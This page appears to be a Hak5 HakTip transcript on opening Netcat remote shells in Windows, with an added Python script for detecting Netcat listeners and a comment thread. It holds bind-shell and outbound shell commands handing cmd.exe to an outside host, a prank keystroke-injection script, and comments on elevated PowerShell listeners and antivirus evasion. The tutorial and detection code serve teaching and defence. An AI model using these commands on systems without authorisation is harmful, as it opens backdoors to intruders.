Netcat 101: Remote Shells in Windows, HakTip 86
- Published on 23 Jul 2024
- Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:
____________________________________________
This week on HakTip Shannon is creating remote shells with Netcat in Windows!
Welcome to HakTip -- the show where we break down concepts, tools and techniques for hackers, gurus and IT ninjas. I'm Shannon Morse and today I'm creating remote shells with Netcat in Windows!
What is a remote shell? It's a command line program, available on all operating systems, that executes shell commands as another user on another computer, even one on a different network. The remote system runs a remote shell daemon that listens on a common TCP port, and you connect to it. This is where we get into a real world scenario: you can use a remote shell to target a computer for nefarious purposes, or to do real world good, like logging files or troubleshooting.
While I'm not going to show you how to get a victim to start a shell on their computer without their knowledge, I will show you how to do a legit remote shell for white hat use. Let's go ahead and prepare the Windows machine for a remote shell. Open your command prompt and change to your Netcat directory. Type the following command:
* nc -Lp 31337 -vv -e cmd.exe
This will open Netcat. -Lp puts it in a persistent listening mode on port 31337, so if the connection is closed on one machine, this listener port will stay open indefinitely, listening for a new connection. -vv tells Netcat to be extra verbose with its output, which will be useful for file transfers, etc. -e opens the "gaping security hole", and cmd.exe tells Netcat that this is the executable it will hand to whoever connects from a remote machine.
Now, on my Linux machine I'm going to connect to the target computer with this command:
* nc 10.73.31.59 31337
This opens Netcat and connects to my Windows machine on port 31337. Once it connects I can do things! I can type dir /w to see a directory listing on the computer. I can make a new directory with md MyDirectory. On my Windows machine I can see the new directory, and I can make sure it's been created with dir /w again on the Linux PC.
Netcat can also run a remote shell out on another port through a server outside of a firewall. So I could run this command: nc hak5.wifipineapple.com 80 -e cmd.exe, and then I could reach the machine through an unencrypted tunnel from the outside world. Easy!
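As an added example (not from the episode or from Hak5), here is the defender-side check for the listener set up above: `nc -Lp 31337 -e cmd.exe` leaves nc.exe holding a LISTENING socket, and `netstat -ano` also shows every peer currently connected to it. The netstat and tasklist output below is constructed; the PIDs and the 10.73.31.12 peer address are assumptions.

```python
import re

# Constructed sample in the format `netstat -ano` prints on Windows.
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       4120
  TCP    10.73.31.59:31337      10.73.31.12:50216      ESTABLISHED     4120
  TCP    10.73.31.59:49701      52.96.7.14:443         ESTABLISHED     3380
"""

# Constructed sample in the format `tasklist /fo csv /nh` prints.
TASKLIST_SAMPLE = '''
"svchost.exe","912","Services","0","9,424 K"
"nc.exe","4120","Console","1","2,112 K"
"cmd.exe","5204","Console","1","3,980 K"
"OUTLOOK.EXE","3380","Console","1","188,512 K"
'''

# Image names of the netcat family; -e on any of them hands a shell to the peer.
SHELL_TOOLS = {"nc.exe", "nc64.exe", "ncat.exe", "cryptcat.exe"}

NETSTAT_RE = re.compile(
    r"\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(LISTENING|ESTABLISHED)\s+(\d+)")


def parse_tasklist(text):
    """Map PID -> lower-cased image name from `tasklist /fo csv /nh` output."""
    procs = {}
    for line in text.strip().splitlines():
        fields = [f.strip('"') for f in line.split('","')]
        procs[int(fields[1])] = fields[0].lower()
    return procs


def find_netcat_listeners(netstat_text, procs):
    """Return {port: {"pid", "image", "peers"}} for every LISTENING socket owned
    by a netcat-family process, with the remote endpoints connected to it."""
    rows = [m.groups() for m in map(NETSTAT_RE.match, netstat_text.splitlines()) if m]
    found = {}
    for _la, lport, _ra, _rp, state, pid in rows:          # pass 1: listeners
        if state == "LISTENING" and procs.get(int(pid)) in SHELL_TOOLS:
            found[int(lport)] = {"pid": int(pid), "image": procs[int(pid)], "peers": []}
    for _la, lport, raddr, rport, state, pid in rows:      # pass 2: who holds a shell
        hit = found.get(int(lport))
        if state == "ESTABLISHED" and hit and hit["pid"] == int(pid):
            hit["peers"].append(f"{raddr}:{rport}")
    return found


if __name__ == "__main__":
    for port, info in find_netcat_listeners(NETSTAT_SAMPLE, parse_tasklist(TASKLIST_SAMPLE)).items():
        print(f"port {port}: {info['image']} (pid {info['pid']}) connected from {info['peers']}")
```

On a real host, feed it the live output of `netstat -ano` and `tasklist /fo csv /nh`; the persistent -L listener shows up even between client sessions, which is exactly what makes it worth alerting on.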
Do you use Netcat? Send me a comment below or email us at tips@hak5.org.
And be sure to check out our sister show, Hak5 for more great stuff just like this. I'll be there, reminding you to trust your technolust.
The HakShop is Hak5's premier store for all of your pen testing needs, including one of my favorites - the USB Rubber Ducky - which looks like a flash drive and types like a keyboard. It can type scripts into a computer ridiculously quickly... like my new fav from forum user N3W that reverses your mouse left and right buttons:
DELAY 4000
GUI r
DELAY 100
STRING RUNDLL32 USER32.DLL,SwapMouseButton
DELAY 200
ENTER
This is great for pranking your coworkers!
We couldn't do this show without your support, so we'd like to thank you with something special:
Use coupon code "Snubs" with any order for your very own signed HakTip stickers. Thanks for supporting the show!
____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community - where all hackers belong. - Science & Technology
Shannon, I use and love netcat because it is so much easier to create a backdoor, chat server and client, banner grab and just network in general. It is just relieving. Thank you hak5
I think it's great that you did this for episode 86 as in x86 shells. lol.
If you're connecting from a Windows PC to a Windows PC, the PsTools suite of SysInternals is really useful. If remoteregistry is active on the target you can use psexec to do this exact thing.
Nice tutorial Shannon, thank you.
Is USB Rubber Ducky waterproof so it may be used in the bathtub?
no when i ordered mine it wasn't a rubber ducky at all !! it was a stupid flash drive ugh RIPOFF
Received mine the other day, successfully got into bath with rubber ducky, now am root@bathroom:~.
Bill ischill lmao
only one way to tell
Hi. Thank you for all the videos! I have a problem... when I try to create a new directory on Windows... it displays "Access denied". Why?
You should use "nc -Lp 31337 -vv -e powershell.exe" instead for more power. If you run this listener from an elevated prompt, powershell will also run elevated. You can check if the remote powershell is admin with the following code:
([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
If you use ncat, the command is "ncat -lkp 31337 -vv -e powershell.exe" where -k is used to make -l persistent.
I read about that
can i use my raspberry pi3 like a little server connected to internet and use it for running programs written with an ipad and then sent to that raspberry for executing them and taking back the result? is there a way for doing that? or something else?
I only use netcat for remote testing whether ports are open because it's quicker than telnet and netmap is banned where I work. I knew you could set it up to listen on a port but didn't know about the -e switch until now.
you are a queen, thank you, keep grinding in these hard days...
Wouldn't work through my WLAN? Firewall was off and sharing was wide-open on each computer, any ideas?
awesome tutorial Shannon :)
Hey guys, I don't know if you are aware of the shell replacement called Cygwin. It's amazing if you are used to linux/unix tools and commands, and you can still use it with tools such as SSH, so you can remote shell without putty as well as get a great terminal for windows.
so why every time i try to install NC it won't let me? this was on windows vista
Nice very informative 👍
waiting for netcat 102 and 103
thx for video
nice one... can i execute a pop message using a netcat?
Hmm... just to answer your question Shannon Morse
What I would love to see you doing is showing us different methods of how to make someone run that shell without them knowing 3:) Haha
Till next time ;)
What linux os do you use? I like it...
How can I see the content of a file if I know the ip address and the port # and also the password? Have a homework problem.
Where did you download netcat for windows. I can't find one that seems legitimate. Nmap has something, but it's not the same thing. It's their version of it, and it doesn't work on my machine.
The only other two places I've found are questionable at best, and both sites report multiple people detecting malware on the programs.
So, where did you get your netcat program from?
We’re in Ghana, how can we buy from Hak5 since my country doesn’t accept PayPal
can you use bash ???
Hi, ma'am, I have a query: I want to select text on the terminal and copy & paste. How can I do this, if you know? Please tell me.
Use "ctrl+shift+c" to copy selected string in terminal
And use "ctrl+shift+v" to paste string (from clipboard) in terminal
I feel that putty is much easier for this purpose.
I was kinda hoping you would go over where to get netcat on windows
if you code a c++ program that downloads nc and starts the command
Do hak5 still have hacking challenges?
i try to connect and it spits out (UNKNOWN) [(my ip)] 31337 (?) : Connection refused
what does this mean and how can i fix it? I'm doing it all on my own machines
check your firewall, real time protection, etc
I really enjoy your videos. I am a worker who tries to keep good records of my work, though my backup computers are older versions of Windows. Will this work across '98, XP, Windows 95 etc? And also, on your example, for connecting from "outside", would I type like "nc 234.33.56.26 80" if that were my address?
Yes it should work on those older systems. As for the WAN connection, you have to forward your listening port which in your case would be "80", that is for HTTP.
oh my .. so, with nc I can actually hack into someone else's computer? Is it really easy like that (I'm a newbie who has just installed ubuntu)
every time i do this it can't connect to the windows machine.
I've tried like 8 different tutorials with different methods, made my own method, done hours upon hours of testing and i can't get this to work. i do the same thing as the video but when i connect from the linux machine nothing happens, it just keeps listening. i've tried different windows machines and powershell. please help
works like a charm! bro you just have to know what you're doing.
FLEKS WALKER yeah i forgot i commented this, i figured it out, safe to say i did not know what i was doing 8 months ago lol
I’m following your steps but I get a connection refused
Any help? Thanks
Probably firewall
Show me how to log cookies and cache from a browser!
Can't we do it without Linux OS !?? I have only Windows 10
Net cat is best
This does not work sometimes. Why it is so ??
can you do it the other way
Created python script that opens a server with port 4444 and an created my own unique acryption alghorthm connect to it via python script that uses netcat and encrypts messages. Hacked into win10, and linux . My first attack that i built everything.
So you...created your own "unique acryption algorthm"........righttttt.....
i love you
second comment :D nice tutorial ty
thanks sweetness
3:07 there is a command you write; why prepare the ducky when you can write the same thing on the victim machine bcoz it was open lol
nc -h does not work
my netcat doesn't have the -e option. why is this?
Same here !!
maybe it's the version of netcat or your operating system
Go download netcat for window and use wine that works
wget agirllikeher -o gf
ping agirllikeher
...
...
...
No response....
//this lol
First comment :)
you can't use these on windows now that all av including defender blocks nc. good luck setting listeners, that won't work
te amo you mujer hermosa
Yes netcat isn't secure so you could use cryptcat instead.
ooh ...now i really want to know the black hat stuff she didn't want to show.
If I type "md MyHirDir" it's probably for girly pictures, or it might be a catalog of mistakes. Pictures of exes?
WTF you can connect to a socket with command prompt 😂. A shell with ps1, ok but a shell with command prompt wtf. Reverse_tcp ?
ping
It’s not obvious at all that she’s reading this off the screen.
Windows 8 Fail !
I can't complain, I didn't pay for the laptop.
Not showing how to get a victim that will automatically execute Netcat, and this is why I wonder why they're called "Hak5". Yes, Netcat is good for learning the basics of shells, but no one is going to use Netcat for "white hat file transfers".
Actually NO. Try copying a 80-200GB file to another machine. Tedious stuff eh? Right now... send the file via NC.... Notice anything? Not having to deal with smb or nfs file overhead is SHOCKINGLY faster!
So as long as the NC connection isn't detected...
you use a tool already compiled and open source, you use it as a malicious backdoor and remote shell, it is a method of lamers. I work for a French company that searches for malware and really netcat as a backdoor is not great.. most people looking to create backdoors want ones that work on the internet and not in a local network such as a LAN.. for use in the WAN, ports must be opened on the router and on the victim's! and remember that this is not a reverse shell! so if your victim is a local example for your VPN and intrusion test is in the LAN and you do not know the local IP address of the target.. this attack is useless.. sorry for this comment but this tutorial apartment is useless to have access to the server or another. PS: netcat with the -e option is detected as a virus..
+Tuto PC, okay sir, but these are NetCat tutorials, not a "Perfect Backdoor tutorial". So for a beginner, this is a perfect video to know what a backdoor is or how it works. PS: there are a lot of polymorphic engines that change netcat's binary code (so it won't be detected as a virus).
Everything you said is true, but this is not the right place to write down your comment.